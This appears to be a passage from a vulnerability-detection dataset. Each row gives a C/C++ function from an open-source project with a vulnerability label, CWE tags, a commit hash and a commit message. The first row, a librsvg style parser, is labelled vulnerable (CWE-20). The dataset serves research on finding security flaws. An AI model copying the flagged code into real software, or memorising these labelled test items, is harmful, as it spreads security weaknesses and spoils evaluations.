CAIRO_LINE_CAP_BUTT; else if (g_str_equal (value, "round")) state->cap = CAIRO_LINE_CAP_ROUND; else if (g_str_equal (value, "square")) state->cap = CAIRO_LINE_CAP_SQUARE; else g_warning (_("unknown line cap style %s\n"), value); } else if (g_str_equal (name, "stroke-opacity")) { state->stroke_opacity = rsvg_css_parse_opacity (value); state->has_stroke_opacity = TRUE; } else if (g_str_equal (name, "stroke-linejoin")) { state->has_join = TRUE; if (g_str_equal (value, "miter")) state->join = CAIRO_LINE_JOIN_MITER; else if (g_str_equal (value, "round")) state->join = CAIRO_LINE_JOIN_ROUND; else if (g_str_equal (value, "bevel")) state->join = CAIRO_LINE_JOIN_BEVEL; else g_warning (_("unknown line join style %s\n"), value); } else if (g_str_equal (name, "font-size")) { state->font_size = _rsvg_css_parse_length (value); state->has_font_size = TRUE; } else if (g_str_equal (name, "font-family")) { char *save = g_strdup (rsvg_css_parse_font_family (value, &state->has_font_family)); g_free (state->font_family); state->font_family = save; } else if (g_str_equal (name, "xml:lang")) { char *save = g_strdup (value); g_free (state->lang); state->lang = save; state->has_lang = TRUE; } else if (g_str_equal (name, "font-style")) { state->font_style = rsvg_css_parse_font_style (value, &state->has_font_style); } else if (g_str_equal (name, "font-variant")) { state->font_variant = rsvg_css_parse_font_variant (value, &state->has_font_variant); } else if (g_str_equal (name, "font-weight")) { state->font_weight = rsvg_css_parse_font_weight (value, &state->has_font_weight); } else if (g_str_equal (name, "font-stretch")) { state->font_stretch = rsvg_css_parse_font_stretch (value, &state->has_font_stretch); } else if (g_str_equal (name, "text-decoration")) { if (g_str_equal (value, "inherit")) { state->has_font_decor = FALSE; state->font_decor = TEXT_NORMAL; } else { if (strstr (value, "underline")) state->font_decor |= TEXT_UNDERLINE; if (strstr (value, "overline")) state->font_decor |= TEXT_OVERLINE; if (strstr (value, "strike") || strstr (value, "line-through")) /* strike though or line-through */ state->font_decor |= TEXT_STRIKE; state->has_font_decor = TRUE; } } else if (g_str_equal (name, "direction")) { state->has_text_dir = TRUE; if (g_str_equal (value, "inherit")) { state->text_dir = PANGO_DIRECTION_LTR; state->has_text_dir = FALSE; } else if (g_str_equal (value, "rtl")) state->text_dir = PANGO_DIRECTION_RTL; else /* ltr */ state->text_dir = PANGO_DIRECTION_LTR; } else if (g_str_equal (name, "unicode-bidi")) { state->has_unicode_bidi = TRUE; if (g_str_equal (value, "inherit")) { state->unicode_bidi = UNICODE_BIDI_NORMAL; state->has_unicode_bidi = FALSE; } else if (g_str_equal (value, "embed")) state->unicode_bidi = UNICODE_BIDI_EMBED; else if (g_str_equal (value, "bidi-override")) state->unicode_bidi = UNICODE_BIDI_OVERRIDE; else /* normal */ state->unicode_bidi = UNICODE_BIDI_NORMAL; } else if (g_str_equal (name, "writing-mode")) { /* TODO: these aren't quite right... */ state->has_text_dir = TRUE; state->has_text_gravity = TRUE; if (g_str_equal (value, "inherit")) { state->text_dir = PANGO_DIRECTION_LTR; state->has_text_dir = FALSE; state->text_gravity = PANGO_GRAVITY_SOUTH; state->has_text_gravity = FALSE; } else if (g_str_equal (value, "lr-tb") || g_str_equal (value, "lr")) { state->text_dir = PANGO_DIRECTION_LTR; state->text_gravity = PANGO_GRAVITY_SOUTH; } else if (g_str_equal (value, "rl-tb") || g_str_equal (value, "rl")) { state->text_dir = PANGO_DIRECTION_RTL; state->text_gravity = PANGO_GRAVITY_SOUTH; } else if (g_str_equal (value, "tb-rl") || g_str_equal (value, "tb")) { state->text_dir = PANGO_DIRECTION_LTR; state->text_gravity = PANGO_GRAVITY_EAST; } } else if (g_str_equal (name, "text-anchor")) { state->has_text_anchor = TRUE; if (g_str_equal (value, "inherit")) { state->text_anchor = TEXT_ANCHOR_START; state->has_text_anchor = FALSE; } else { if (strstr (value, "start")) state->text_anchor = TEXT_ANCHOR_START; else if (strstr (value, "middle")) state->text_anchor = TEXT_ANCHOR_MIDDLE; else if (strstr (value, "end")) state->text_anchor = TEXT_ANCHOR_END; } } else if (g_str_equal (name, "letter-spacing")) { state->has_letter_spacing = TRUE; state->letter_spacing = _rsvg_css_parse_length (value); } else if (g_str_equal (name, "stop-color")) { if (!g_str_equal (value, "inherit")) { state->stop_color = rsvg_css_parse_color (value, &state->has_stop_color); } } else if (g_str_equal (name, "stop-opacity")) { if (!g_str_equal (value, "inherit")) { state->has_stop_opacity = TRUE; state->stop_opacity = rsvg_css_parse_opacity (value); } } else if (g_str_equal (name, "marker-start")) { state->startMarker = rsvg_marker_parse (ctx->priv->defs, value); state->has_startMarker = TRUE; } else if (g_str_equal (name, "marker-mid")) { state->middleMarker = rsvg_marker_parse (ctx->priv->defs, value); state->has_middleMarker = TRUE; } else if (g_str_equal (name, "marker-end")) { state->endMarker = rsvg_marker_parse (ctx->priv->defs, value); state->has_endMarker = TRUE; } else if (g_str_equal (name, "stroke-miterlimit")) { state->has_miter_limit = TRUE; state->miter_limit = g_ascii_strtod (value, NULL); } else if (g_str_equal (name, "stroke-dashoffset")) { state->has_dashoffset = TRUE; state->dash.offset = _rsvg_css_parse_length (value); if (state->dash.offset.length < 0.) state->dash.offset.length = 0.; } else if (g_str_equal (name, "shape-rendering")) { state->has_shape_rendering_type = TRUE; if (g_str_equal (value, "auto") || g_str_equal (value, "default")) state->shape_rendering_type = SHAPE_RENDERING_AUTO; else if (g_str_equal (value, "optimizeSpeed")) state->shape_rendering_type = SHAPE_RENDERING_OPTIMIZE_SPEED; else if (g_str_equal (value, "crispEdges")) state->shape_rendering_type = SHAPE_RENDERING_CRISP_EDGES; else if (g_str_equal (value, "geometricPrecision")) state->shape_rendering_type = SHAPE_RENDERING_GEOMETRIC_PRECISION; } else if (g_str_equal (name, "text-rendering")) { state->has_text_rendering_type = TRUE; if (g_str_equal (value, "auto") || g_str_equal (value, "default")) state->text_rendering_type = TEXT_RENDERING_AUTO; else if (g_str_equal (value, "optimizeSpeed")) state->text_rendering_type = TEXT_RENDERING_OPTIMIZE_SPEED; else if (g_str_equal (value, "optimizeLegibility")) state->text_rendering_type = TEXT_RENDERING_OPTIMIZE_LEGIBILITY; else if (g_str_equal (value, "geometricPrecision")) state->text_rendering_type = TEXT_RENDERING_GEOMETRIC_PRECISION; } else if (g_str_equal (name, "stroke-dasharray")) { state->has_dash = TRUE; if (g_str_equal (value, "none")) { if (state->dash.n_dash != 0) { /* free any cloned dash data */ g_free (state->dash.dash); state->dash.dash = NULL; state->dash.n_dash = 0; } } else { gchar **dashes = g_strsplit (value, ",", -1); if (NULL != dashes) { gint n_dashes, i; gboolean is_even = FALSE; gdouble total = 0; /* count the #dashes */ for (n_dashes = 0; dashes[n_dashes] != NULL; n_dashes++); is_even = (n_dashes % 2 == 0); state->dash.n_dash = (is_even ? n_dashes : n_dashes * 2); state->dash.dash = g_new (double, state->dash.n_dash); /* TODO: handle negative value == error case */ /* the even and base case */ for (i = 0; i < n_dashes; i++) { state->dash.dash[i] = g_ascii_strtod (dashes[i], NULL); total += state->dash.dash[i]; } /* if an odd number of dashes is found, it gets repeated */ if (!is_even) for (; i < state->dash.n_dash; i++) state->dash.dash[i] = state->dash.dash[i - n_dashes]; g_strfreev (dashes); /* If the dashes add up to 0, then it should be ignored */ if (total == 0) { g_free (state->dash.dash); state->dash.dash = NULL; state->dash.n_dash = 0; } } } } }
1
[ "CWE-20" ]
librsvg
d1c9191949747f6dcfd207831d15dd4ba00e31f2
66,552,833,168,416,300,000,000,000,000,000,000,000
388
state: Store mask as reference Instead of immediately looking up the mask, store the reference and look it up on use.
Value ExpressionBsonSize::evaluate(const Document& root, Variables* variables) const { Value arg = _children[0]->evaluate(root, variables); if (arg.nullish()) return Value(BSONNULL); uassert(31393, str::stream() << "$bsonSize requires a document input, found: " << typeName(arg.getType()), arg.getType() == BSONType::Object); return Value(arg.getDocument().toBson().objsize()); }
0
[]
mongo
1772b9a0393b55e6a280a35e8f0a1f75c014f301
75,138,442,077,873,490,000,000,000,000,000,000,000
13
SERVER-49404 Enforce additional checks in $arrayToObject
tsize_t t2p_write_pdf_xobject_palettecs_stream(T2P* t2p, TIFF* output){ tsize_t written=0; written += t2p_write_pdf_stream( (tdata_t) t2p->pdf_palette, (tsize_t) t2p->pdf_palettesize, output); return(written); }
0
[ "CWE-787" ]
libtiff
7be2e452ddcf6d7abca88f41d3761e6edab72b22
178,668,200,132,061,750,000,000,000,000,000,000,000
11
tiff2pdf.c: properly calculate datasize when saving to JPEG YCbCr fixes #220
pci_emul_add_pciecap(struct pci_vdev *dev, int type) { int err; struct pciecap pciecap; if (type != PCIEM_TYPE_ROOT_PORT) return -1; bzero(&pciecap, sizeof(pciecap)); pciecap.capid = PCIY_EXPRESS; pciecap.pcie_capabilities = PCIECAP_VERSION | PCIEM_TYPE_ROOT_PORT; pciecap.link_capabilities = 0x411; /* gen1, x1 */ pciecap.link_status = 0x11; /* gen1, x1 */ err = pci_emul_add_capability(dev, (u_char *)&pciecap, sizeof(pciecap)); return err; }
0
[ "CWE-617", "CWE-703" ]
acrn-hypervisor
6199e653418eda58cd698d8769820904453e2535
307,105,363,114,329,800,000,000,000,000,000,000,000
18
dm: validate the input in 'pci_emul_mem_handler()' checking the inputs explicitly instead of using Assert. Tracked-On: #4003 Signed-off-by: Yonghua Huang <[email protected]> Reviewed-by: Shuo Liu <[email protected]> Acked-by: Yu Wang <[email protected]>
static size_t snd_compr_calc_avail(struct snd_compr_stream *stream, struct snd_compr_avail *avail) { memset(avail, 0, sizeof(*avail)); snd_compr_update_tstamp(stream, &avail->tstamp); /* Still need to return avail even if tstamp can't be filled in */ if (stream->runtime->total_bytes_available == 0 && stream->runtime->state == SNDRV_PCM_STATE_SETUP && stream->direction == SND_COMPRESS_PLAYBACK) { pr_debug("detected init and someone forgot to do a write\n"); return stream->runtime->buffer_size; } pr_debug("app wrote %lld, DSP consumed %lld\n", stream->runtime->total_bytes_available, stream->runtime->total_bytes_transferred); if (stream->runtime->total_bytes_available == stream->runtime->total_bytes_transferred) { if (stream->direction == SND_COMPRESS_PLAYBACK) { pr_debug("both pointers are same, returning full avail\n"); return stream->runtime->buffer_size; } else { pr_debug("both pointers are same, returning no avail\n"); return 0; } } avail->avail = stream->runtime->total_bytes_available - stream->runtime->total_bytes_transferred; if (stream->direction == SND_COMPRESS_PLAYBACK) avail->avail = stream->runtime->buffer_size - avail->avail; pr_debug("ret avail as %lld\n", avail->avail); return avail->avail; }
0
[ "CWE-703" ]
linux
6217e5ede23285ddfee10d2e4ba0cc2d4c046205
162,429,048,695,875,880,000,000,000,000,000,000,000
35
ALSA: compress: fix an integer overflow check I previously added an integer overflow check here but looking at it now, it's still buggy. The bug happens in snd_compr_allocate_buffer(). We multiply ".fragments" and ".fragment_size" and that doesn't overflow but then we save it in an unsigned int so it truncates the high bits away and we allocate a smaller than expected size. Fixes: b35cc8225845 ('ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()') Signed-off-by: Dan Carpenter <[email protected]> Signed-off-by: Takashi Iwai <[email protected]>
dns_zone_flush(dns_zone_t *zone) { isc_result_t result = ISC_R_SUCCESS; bool dumping; REQUIRE(DNS_ZONE_VALID(zone)); LOCK_ZONE(zone); DNS_ZONE_SETFLAG(zone, DNS_ZONEFLG_FLUSH); if (DNS_ZONE_FLAG(zone, DNS_ZONEFLG_NEEDDUMP) && zone->masterfile != NULL) { result = ISC_R_ALREADYRUNNING; dumping = was_dumping(zone); } else dumping = true; UNLOCK_ZONE(zone); if (!dumping) result = zone_dump(zone, true); /* Unknown task. */ return (result); }
0
[ "CWE-327" ]
bind9
f09352d20a9d360e50683cd1d2fc52ccedcd77a0
173,745,244,903,399,580,000,000,000,000,000,000,000
19
Update keyfetch_done compute_tag check If in keyfetch_done the compute_tag fails (because for example the algorithm is not supported), don't crash, but instead ignore the key.
static int nfs4_verify_channel_attrs(struct nfs41_create_session_args *args, struct nfs41_create_session_res *res) { int ret; ret = nfs4_verify_fore_channel_attrs(args, res); if (ret) return ret; return nfs4_verify_back_channel_attrs(args, res); }
0
[ "CWE-787" ]
linux
b4487b93545214a9db8cbf32e86411677b0cca21
266,510,953,336,912,230,000,000,000,000,000,000,000
10
nfs: Fix getxattr kernel panic and memory overflow Move the buffer size check to decode_attr_security_label() before memcpy() Only call memcpy() if the buffer is large enough Fixes: aa9c2669626c ("NFS: Client implementation of Labeled-NFS") Signed-off-by: Jeffrey Mitchell <[email protected]> [Trond: clean up duplicate test of label->len != 0] Signed-off-by: Trond Myklebust <[email protected]>
static inline void posix_cpu_timers_init(struct task_struct *tsk) { }
0
[ "CWE-416", "CWE-703" ]
linux
2b7e8665b4ff51c034c55df3cff76518d1a9ee3a
131,907,813,316,772,970,000,000,000,000,000,000,000
1
fork: fix incorrect fput of ->exe_file causing use-after-free Commit 7c051267931a ("mm, fork: make dup_mmap wait for mmap_sem for write killable") made it possible to kill a forking task while it is waiting to acquire its ->mmap_sem for write, in dup_mmap(). However, it was overlooked that this introduced an new error path before a reference is taken on the mm_struct's ->exe_file. Since the ->exe_file of the new mm_struct was already set to the old ->exe_file by the memcpy() in dup_mm(), it was possible for the mmput() in the error path of dup_mm() to drop a reference to ->exe_file which was never taken. This caused the struct file to later be freed prematurely. Fix it by updating mm_init() to NULL out the ->exe_file, in the same place it clears other things like the list of mmaps. This bug was found by syzkaller. It can be reproduced using the following C program: #define _GNU_SOURCE #include <pthread.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/wait.h> #include <unistd.h> static void *mmap_thread(void *_arg) { for (;;) { mmap(NULL, 0x1000000, PROT_READ, MAP_POPULATE|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); } } static void *fork_thread(void *_arg) { usleep(rand() % 10000); fork(); } int main(void) { fork(); fork(); fork(); for (;;) { if (fork() == 0) { pthread_t t; pthread_create(&t, NULL, mmap_thread, NULL); pthread_create(&t, NULL, fork_thread, NULL); usleep(rand() % 10000); syscall(__NR_exit_group, 0); } wait(NULL); } } No special kernel config options are needed. It usually causes a NULL pointer dereference in __remove_shared_vm_struct() during exit, or in dup_mmap() (which is usually inlined into copy_process()) during fork. Both are due to a vm_area_struct's ->vm_file being used after it's already been freed. Google Bug Id: 64772007 Link: http://lkml.kernel.org/r/[email protected] Fixes: 7c051267931a ("mm, fork: make dup_mmap wait for mmap_sem for write killable") Signed-off-by: Eric Biggers <[email protected]> Tested-by: Mark Rutland <[email protected]> Acked-by: Michal Hocko <[email protected]> Cc: Dmitry Vyukov <[email protected]> Cc: Ingo Molnar <[email protected]> Cc: Konstantin Khlebnikov <[email protected]> Cc: Oleg Nesterov <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Vlastimil Babka <[email protected]> Cc: <[email protected]> [v4.7+] Signed-off-by: Andrew Morton <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
static struct cmd_rcvr *find_cmd_rcvr(struct ipmi_smi *intf, unsigned char netfn, unsigned char cmd, unsigned char chan) { struct cmd_rcvr *rcvr; list_for_each_entry_rcu(rcvr, &intf->cmd_rcvrs, link) { if ((rcvr->netfn == netfn) && (rcvr->cmd == cmd) && (rcvr->chans & (1 << chan))) return rcvr; } return NULL; }
0
[ "CWE-416", "CWE-284" ]
linux
77f8269606bf95fcb232ee86f6da80886f1dfae8
6,602,710,983,622,352,000,000,000,000,000,000,000
14
ipmi: fix use-after-free of user->release_barrier.rda When we do the following test, we got oops in ipmi_msghandler driver while((1)) do service ipmievd restart & service ipmievd restart done --------------------------------------------------------------- [ 294.230186] Unable to handle kernel paging request at virtual address 0000803fea6ea008 [ 294.230188] Mem abort info: [ 294.230190] ESR = 0x96000004 [ 294.230191] Exception class = DABT (current EL), IL = 32 bits [ 294.230193] SET = 0, FnV = 0 [ 294.230194] EA = 0, S1PTW = 0 [ 294.230195] Data abort info: [ 294.230196] ISV = 0, ISS = 0x00000004 [ 294.230197] CM = 0, WnR = 0 [ 294.230199] user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000a1c1b75a [ 294.230201] [0000803fea6ea008] pgd=0000000000000000 [ 294.230204] Internal error: Oops: 96000004 [#1] SMP [ 294.235211] Modules linked in: nls_utf8 isofs rpcrdma ib_iser ib_srpt target_core_mod ib_srp scsi_transport_srp ib_ipoib rdma_ucm ib_umad rdma_cm ib_cm iw_cm dm_mirror dm_region_hash dm_log dm_mod aes_ce_blk crypto_simd cryptd aes_ce_cipher ghash_ce sha2_ce ses sha256_arm64 sha1_ce hibmc_drm hisi_sas_v2_hw enclosure sg hisi_sas_main sbsa_gwdt ip_tables mlx5_ib ib_uverbs marvell ib_core mlx5_core ixgbe ipmi_si mdio hns_dsaf ipmi_devintf ipmi_msghandler hns_enet_drv hns_mdio [ 294.277745] CPU: 3 PID: 0 Comm: swapper/3 Kdump: loaded Not tainted 5.0.0-rc2+ #113 [ 294.285511] Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.37 11/21/2017 [ 294.292835] pstate: 80000005 (Nzcv daif -PAN -UAO) [ 294.297695] pc : __srcu_read_lock+0x38/0x58 [ 294.301940] lr : acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler] [ 294.307853] sp : ffff00001001bc80 [ 294.311208] x29: ffff00001001bc80 x28: ffff0000117e5000 [ 294.316594] x27: 0000000000000000 x26: dead000000000100 [ 294.321980] x25: dead000000000200 x24: ffff803f6bd06800 [ 294.327366] x23: 0000000000000000 x22: 0000000000000000 [ 294.332752] x21: ffff00001001bd04 x20: ffff80df33d19018 [ 294.338137] x19: ffff80df33d19018 x18: 0000000000000000 [ 294.343523] x17: 0000000000000000 x16: 0000000000000000 [ 294.348908] x15: 0000000000000000 x14: 0000000000000002 [ 294.354293] x13: 0000000000000000 x12: 0000000000000000 [ 294.359679] x11: 0000000000000000 x10: 0000000000100000 [ 294.365065] x9 : 0000000000000000 x8 : 0000000000000004 [ 294.370451] x7 : 0000000000000000 x6 : ffff80df34558678 [ 294.375836] x5 : 000000000000000c x4 : 0000000000000000 [ 294.381221] x3 : 0000000000000001 x2 : 0000803fea6ea000 [ 294.386607] x1 : 0000803fea6ea008 x0 : 0000000000000001 [ 294.391994] Process swapper/3 (pid: 0, stack limit = 0x0000000083087293) [ 294.398791] Call trace: [ 294.401266] __srcu_read_lock+0x38/0x58 [ 294.405154] acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler] [ 294.410716] deliver_response+0x80/0xf8 [ipmi_msghandler] [ 294.416189] deliver_local_response+0x28/0x68 [ipmi_msghandler] [ 294.422193] handle_one_recv_msg+0x158/0xcf8 [ipmi_msghandler] [ 294.432050] handle_new_recv_msgs+0xc0/0x210 [ipmi_msghandler] [ 294.441984] smi_recv_tasklet+0x8c/0x158 [ipmi_msghandler] [ 294.451618] tasklet_action_common.isra.5+0x88/0x138 [ 294.460661] tasklet_action+0x2c/0x38 [ 294.468191] __do_softirq+0x120/0x2f8 [ 294.475561] irq_exit+0x134/0x140 [ 294.482445] __handle_domain_irq+0x6c/0xc0 [ 294.489954] gic_handle_irq+0xb8/0x178 [ 294.497037] el1_irq+0xb0/0x140 [ 294.503381] arch_cpu_idle+0x34/0x1a8 [ 294.510096] do_idle+0x1d4/0x290 [ 294.516322] cpu_startup_entry+0x28/0x30 [ 294.523230] secondary_start_kernel+0x184/0x1d0 [ 294.530657] Code: d538d082 d2800023 8b010c81 8b020021 (c85f7c25) [ 294.539746] ---[ end trace 8a7a880dee570b29 ]--- [ 294.547341] Kernel panic - not syncing: Fatal exception in interrupt [ 294.556837] SMP: stopping secondary CPUs [ 294.563996] Kernel Offset: disabled [ 294.570515] CPU features: 0x002,21006008 [ 294.577638] Memory Limit: none [ 294.587178] Starting crashdump kernel... [ 294.594314] Bye! Because the user->release_barrier.rda is freed in ipmi_destroy_user(), but the refcount is not zero, when acquire_ipmi_user() uses user->release_barrier.rda in __srcu_read_lock(), it causes oops. Fix this by calling cleanup_srcu_struct() when the refcount is zero. Fixes: e86ee2d44b44 ("ipmi: Rework locking and shutdown for hot remove") Cc: [email protected] # 4.18 Signed-off-by: Yang Yingliang <[email protected]> Signed-off-by: Corey Minyard <[email protected]>
int test_div(BIO *bp, BN_CTX *ctx) { BIGNUM a,b,c,d,e; int i; BN_init(&a); BN_init(&b); BN_init(&c); BN_init(&d); BN_init(&e); for (i=0; i<num0+num1; i++) { if (i < num1) { BN_bntest_rand(&a,400,0,0); BN_copy(&b,&a); BN_lshift(&a,&a,i); BN_add_word(&a,i); } else BN_bntest_rand(&b,50+3*(i-num1),0,0); a.neg=rand_neg(); b.neg=rand_neg(); BN_div(&d,&c,&a,&b,ctx); if (bp != NULL) { if (!results) { BN_print(bp,&a); BIO_puts(bp," / "); BN_print(bp,&b); BIO_puts(bp," - "); } BN_print(bp,&d); BIO_puts(bp,"\n"); if (!results) { BN_print(bp,&a); BIO_puts(bp," % "); BN_print(bp,&b); BIO_puts(bp," - "); } BN_print(bp,&c); BIO_puts(bp,"\n"); } BN_mul(&e,&d,&b,ctx); BN_add(&d,&e,&c); BN_sub(&d,&d,&a); if(!BN_is_zero(&d)) { fprintf(stderr,"Division test failed!\n"); return 0; } } BN_free(&a); BN_free(&b); BN_free(&c); BN_free(&d); BN_free(&e); return(1); }
0
[ "CWE-310" ]
openssl
a7a44ba55cb4f884c6bc9ceac90072dea38e66d0
129,067,452,262,468,770,000,000,000,000,000,000,000
63
Fix for CVE-2014-3570 (with minor bn_asm.c revamp). Reviewed-by: Emilia Kasper <[email protected]>
static __be32 fattr_handle_absent_fs(u32 *bmval0, u32 *bmval1, u32 *bmval2, u32 *rdattr_err) { /* As per referral draft: */ if (*bmval0 & ~WORD0_ABSENT_FS_ATTRS || *bmval1 & ~WORD1_ABSENT_FS_ATTRS) { if (*bmval0 & FATTR4_WORD0_RDATTR_ERROR || *bmval0 & FATTR4_WORD0_FS_LOCATIONS) *rdattr_err = NFSERR_MOVED; else return nfserr_moved; } *bmval0 &= WORD0_ABSENT_FS_ATTRS; *bmval1 &= WORD1_ABSENT_FS_ATTRS; *bmval2 &= WORD2_ABSENT_FS_ATTRS; return 0; }
0
[ "CWE-20", "CWE-129" ]
linux
f961e3f2acae94b727380c0b74e2d3954d0edf79
174,559,418,976,563,500,000,000,000,000,000,000,000
16
nfsd: encoders mustn't use unitialized values in error cases In error cases, lgp->lg_layout_type may be out of bounds; so we shouldn't be using it until after the check of nfserr. This was seen to crash nfsd threads when the server receives a LAYOUTGET request with a large layout type. GETDEVICEINFO has the same problem. Reported-by: Ari Kauppi <[email protected]> Reviewed-by: Christoph Hellwig <[email protected]> Cc: [email protected] Signed-off-by: J. Bruce Fields <[email protected]>
ProcessPtr handleSpawnResponse(const SpawnPreparationInfo &preparation, NegotiationDetails &details) { TRACE_POINT(); SocketListPtr sockets = make_shared<SocketList>(); while (true) { string line; try { line = readMessageLine(details); } catch (const SystemException &e) { throwAppSpawnException("An error occurred while starting the " "web application. There was an I/O error while reading its " "startup response: " + e.sys(), SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } catch (const TimeoutException &) { throwAppSpawnException("An error occurred while starting the " "web application: it did not write a startup response in time.", SpawnException::APP_STARTUP_TIMEOUT, details); } if (line.empty()) { throwAppSpawnException("An error occurred while starting the " "web application. It unexpected closed the connection while " "sending its startup response.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } else if (line[line.size() - 1] != '\n') { throwAppSpawnException("An error occurred while starting the " "web application. It sent a line without a newline character " "in its startup response.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } else if (line == "\n") { break; } string::size_type pos = line.find(": "); if (pos == string::npos) { throwAppSpawnException("An error occurred while starting the " "web application. It sent a startup response line without " "separator.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } string key = line.substr(0, pos); string value = line.substr(pos + 2, line.size() - pos - 3); if (key == "socket") { // socket: <name>;<address>;<protocol>;<concurrency> // TODO: in case of TCP sockets, check whether it points to localhost // TODO: in case of unix sockets, check whether filename is absolute // and whether owner is correct vector<string> args; split(value, ';', args); if (args.size() == 4) { string error = validateSocketAddress(preparation, details, args[1]); if (!error.empty()) { throwAppSpawnException( "An error occurred while starting the web application. " + error, SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } sockets->add(args[0], fixupSocketAddress(*details.options, args[1]), args[2], atoi(args[3])); } else { throwAppSpawnException("An error occurred while starting the " "web application. It reported a wrongly formatted 'socket'" "response value: '" + value + "'", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } } else { throwAppSpawnException("An error occurred while starting the " "web application. It sent an unknown startup response line " "called '" + key + "'.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } } if (sockets->hasSessionSockets() == 0) { throwAppSpawnException("An error occured while starting the web " "application. It did not advertise any session sockets.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } return make_shared<Process>(details.libev, details.pid, details.gupid, details.connectPassword, details.adminSocket, details.errorPipe, sockets, creationTime, details.spawnStartTime, config); }
0
[]
passenger
8c6693e0818772c345c979840d28312c2edd4ba4
236,240,472,906,062,350,000,000,000,000,000,000,000
98
Security check socket filenames reported by spawned application processes.
static MagickBooleanType EncodeLabImage(Image *image,ExceptionInfo *exception) { CacheView *image_view; MagickBooleanType status; ssize_t y; status=MagickTrue; image_view=AcquireAuthenticCacheView(image,exception); for (y=0; y < (ssize_t) image->rows; y++) { register Quantum *magick_restrict q; register ssize_t x; if (status == MagickFalse) continue; q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception); if (q == (Quantum *) NULL) { status=MagickFalse; continue; } for (x=0; x < (ssize_t) image->columns; x++) { double a, b; a=QuantumScale*GetPixela(image,q)-0.5; if (a < 0.0) a+=1.0; b=QuantumScale*GetPixelb(image,q)-0.5; if (b < 0.0) b+=1.0; SetPixela(image,QuantumRange*a,q); SetPixelb(image,QuantumRange*b,q); q+=GetPixelChannels(image); } if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse) status=MagickFalse; } image_view=DestroyCacheView(image_view); return(status); }
0
[ "CWE-125" ]
ImageMagick
803bc34ebe023f209f745baf8a112610ff77cc8c
123,988,102,557,264,340,000,000,000,000,000,000,000
51
Prevent possible buffer overflow when reading TIFF images (bug report from Shi Pu of MS509 Team)
bool CMerkleTx::AcceptToMemoryPool() { CTxDB txdb("r"); return AcceptToMemoryPool(txdb); }
0
[ "CWE-16", "CWE-787" ]
bitcoin
a206b0ea12eb4606b93323268fc81a4f1f952531
200,817,970,836,112,740,000,000,000,000,000,000,000
5
Do not allow overwriting unspent transactions (BIP 30) Introduce the following network rule: * a block is not valid if it contains a transaction whose hash already exists in the block chain, unless all that transaction's outputs were already spent before said block. Warning: this is effectively a network rule change, with potential risk for forking the block chain. Leaving this unfixed carries the same risk however, for attackers that can cause a reorganisation in part of the network. Thanks to Russell O'Connor and Ben Reeves.
set_default_modes (server *serv) { char modes[8]; modes[0] = '+'; modes[1] = '\0'; if (prefs.hex_irc_wallops) strcat (modes, "w"); if (prefs.hex_irc_servernotice) strcat (modes, "s"); if (prefs.hex_irc_invisible) strcat (modes, "i"); if (prefs.hex_irc_hidehost) strcat (modes, "x"); if (modes[1] != '\0') { serv->p_mode (serv, serv->nick, modes); } }
0
[ "CWE-22" ]
hexchat
4e061a43b3453a9856d34250c3913175c45afe9d
151,497,800,777,553,950,000,000,000,000,000,000,000
21
Clean up handling CAP LS
static int ZEND_FASTCALL ZEND_ADD_ARRAY_ELEMENT_SPEC_CONST_TMP_HANDLER(ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op2; zval *array_ptr = &EX_T(opline->result.u.var).tmp_var; zval *expr_ptr; zval *offset=_get_zval_ptr_tmp(&opline->op2, EX(Ts), &free_op2 TSRMLS_CC); #if 0 || IS_CONST == IS_VAR || IS_CONST == IS_CV zval **expr_ptr_ptr = NULL; if (opline->extended_value) { expr_ptr_ptr=NULL; expr_ptr = *expr_ptr_ptr; } else { expr_ptr=&opline->op1.u.constant; } #else expr_ptr=&opline->op1.u.constant; #endif if (0) { /* temporary variable */ zval *new_expr; ALLOC_ZVAL(new_expr); INIT_PZVAL_COPY(new_expr, expr_ptr); expr_ptr = new_expr; } else { #if 0 || IS_CONST == IS_VAR || IS_CONST == IS_CV if (opline->extended_value) { SEPARATE_ZVAL_TO_MAKE_IS_REF(expr_ptr_ptr); expr_ptr = *expr_ptr_ptr; Z_ADDREF_P(expr_ptr); } else #endif if (IS_CONST == IS_CONST || PZVAL_IS_REF(expr_ptr)) { zval *new_expr; ALLOC_ZVAL(new_expr); INIT_PZVAL_COPY(new_expr, expr_ptr); expr_ptr = new_expr; zendi_zval_copy_ctor(*expr_ptr); } else { Z_ADDREF_P(expr_ptr); } } if (offset) { switch (Z_TYPE_P(offset)) { case IS_DOUBLE: zend_hash_index_update(Z_ARRVAL_P(array_ptr), zend_dval_to_lval(Z_DVAL_P(offset)), &expr_ptr, sizeof(zval *), NULL); break; case IS_LONG: case IS_BOOL: zend_hash_index_update(Z_ARRVAL_P(array_ptr), Z_LVAL_P(offset), &expr_ptr, sizeof(zval *), NULL); break; case IS_STRING: zend_symtable_update(Z_ARRVAL_P(array_ptr), Z_STRVAL_P(offset), Z_STRLEN_P(offset)+1, &expr_ptr, sizeof(zval *), NULL); break; case IS_NULL: zend_hash_update(Z_ARRVAL_P(array_ptr), "", sizeof(""), &expr_ptr, sizeof(zval *), NULL); break; default: zend_error(E_WARNING, "Illegal offset type"); zval_ptr_dtor(&expr_ptr); /* do nothing */ break; } zval_dtor(free_op2.var); } else { zend_hash_next_index_insert(Z_ARRVAL_P(array_ptr), &expr_ptr, sizeof(zval *), NULL); } if (opline->extended_value) { } else { } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
